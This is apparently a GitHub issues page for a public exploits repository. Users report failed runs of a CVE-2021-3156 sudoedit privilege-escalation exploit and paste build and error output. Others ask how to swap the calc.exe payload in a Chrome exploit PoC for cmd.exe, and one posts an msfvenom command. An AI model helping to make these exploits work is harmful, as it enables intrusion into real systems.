r4j0x00 / exploits
License: BSD 2-Clause "Simplified" License
The one shot exploit doesn't work on Linux Lite
sudoedit: QXKVvwCKFbQgszpjZpDJduUXZLfVpeRG4094 is owned by uid 1000, should be 0
sudoedit: no password was provided
sudoedit: QXKVvwCKFbQgszpjZpDJduUXZLfVpeRG4095 is owned by uid 1000, should be 0
sudoedit: no password was provided
Failed
VERSION="20.04.1 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Linux Lite 5.2"
VERSION_ID="20.04"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Running Sudo version 1.8.31
and it created all of these folders on the desktop too.
Chrome gives the following.
Error code: STATUS_ACCESS_VIOLATION
Version 85.0.4183.83 (Official Build) (64-bit)
I'm trying to replace in POC calc.exe with cmd.exe. I'm generating shellcode using msf:
msfvenom -p windows/x64/exec CMD = 'cmd.exe'
Then I convert the shellcode with convert_shellcode.js, but when I execute exploit.html, it doesn't work. How exactly do I need to generate shellcode for cmd.exe?
thanks.
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$ make
gcc exploit.c -o exploit
exploit.c: In function ‘main’:
exploit.c:75:5: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]
execve(argv[0], argv, env);
^~~~~~
mkdir libnss_X
gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$ ./exploit
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$ uname -a
Linux debian-buster.*** 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$
Hello,
I'm trying to execute the CVE-2021-3156 exploit and can't succeed.
I'm getting a lot of "sudoedit: [...] : editing files in a writable directory is not permitted"
Do you have any clue why it's not working here?
Thanks
Why is the for loop exactly 1000? Does it just have to be >a lot< (maybe depending on how beefy the system it's running on is)?
I use msf to create shellcode,
then convert shellcode with convert_shellcode.js and replace the shellcode in exploit.js
but when I execute exploit.html in Chrome, it's not successful